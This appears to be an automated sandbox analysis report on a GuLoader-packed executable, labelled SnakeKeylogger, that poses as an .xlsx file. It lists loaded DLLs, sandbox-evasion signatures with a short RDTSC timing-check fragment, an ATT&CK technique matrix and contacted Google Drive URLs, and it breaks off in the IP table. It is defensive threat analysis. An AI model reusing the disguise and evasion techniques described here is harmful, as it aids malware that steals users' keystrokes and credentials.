      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.2751336924.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1600421494.0000000007ED3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI/Special instruction interceptor: Address: 805F3C6
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI/Special instruction interceptor: Address: 4BCF3C6
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeRDTSC instruction interceptor: First address: 801FC59 second address: 801FC59 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 0BE15CA1h 0x00000008 test dh, ah 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F11BCF30680h 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ah, bh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeRDTSC instruction interceptor: First address: 4B8FC59 second address: 4B8FC59 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 0BE15CA1h 0x00000008 test dh, ah 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F11BCF3AE70h 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ah, bh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe TID: 5868Thread sleep time: -190000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000731E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWHr
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000731E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI call chain: ExitProcess graph end nodegraph_0-4734
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI call chain: ExitProcess graph end nodegraph_0-4735
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00402C44 LdrInitializeThunk,RegOpenKeyExW,0_2_00402C44
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"Jump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00405F6A GetVersion,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryW,LdrInitializeThunk,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      Query Registry      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory21
      Security Software Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager1
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS3
      File and Directory Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets23
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      09-FD-94.03.60.175.07.xlsx.exe55%ReversingLabsWin32.Trojan.SnakeKeylogger

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.19.174
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.181.1
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.google.com/H409-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/y09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2331421259.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413081299.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2574815814.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494127726.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358849652.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413036716.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494107292.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520839204.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2548177786.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://translate.google.com/translate_a/element.js09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.google.com/09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2304015141.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1859716292.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.google.com/U09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/ertificates09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/t09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.usercontent.google.com/09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/k09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://apis.google.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorError09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000000.1483101932.0000000000409000.00000008.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000000.1589553234.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/P09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.181.1
